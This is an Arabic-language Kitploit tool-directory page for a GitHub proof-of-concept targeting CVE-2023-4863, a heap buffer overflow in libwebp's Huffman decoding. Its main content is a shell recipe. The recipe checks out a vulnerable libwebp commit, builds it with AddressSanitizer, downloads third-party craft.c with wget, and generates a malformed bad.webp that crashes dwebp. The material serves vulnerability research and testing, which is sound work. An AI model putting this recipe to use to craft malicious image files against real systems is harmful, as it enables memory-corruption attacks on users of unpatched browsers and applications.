Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-4863 — استغلال إثبات المفهوم لـ CVE-2023-4863، وهو فيضان مخزن مؤقت في الكومة في فك تشفير جدول هوفمان في libwebp، مع بناء مع تمكين AddressSanitizer وتوليد ملف التشغيل. | Kitploit
أدوات/GitHubGitHub/bbaranoff/cve-2023-4863
تحليل الذاكرة الجنائيتحليل الثغرات الأمنيةالاستغلالالاختبار العشوائياستغلال الملفات الثنائية
GitHubbbaranoff/cve-2023-4863

CVE-2023-4863

استغلال إثبات المفهوم لـ CVE-2023-4863، وهو فيضان مخزن مؤقت في الكومة في فك تشفير جدول هوفمان في libwebp، مع بناء مع تمكين AddressSanitizer وتوليد ملف التشغيل.

عرض المستودع
62منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-4863

root@kitploit:~
  # checkout webp
git clone https://chromium.googlesource.com/webm/libwebp/ webp_test
cd webp_test/
  # checkout vulnerable version
git checkout 7ba44f80f3b94fc0138db159afea770ef06532a0
  # enable AddressSanitizer
sed -i 's/^EXTRA_FLAGS=.*/& -fsanitize=address/' makefile.unix
  # build webp
make -f makefile.unix
cd examples/
  # fetch mistymntncop's proof-of-concept code
wget https://raw.githubusercontent.com/mistymntncop/CVE-2023-4863/main/craft.c
  # build and run proof-of-concept
gcc -o craft craft.c
./craft bad.webp
  # test trigger file
./dwebp bad.webp -o test.png
تنزيل الأداة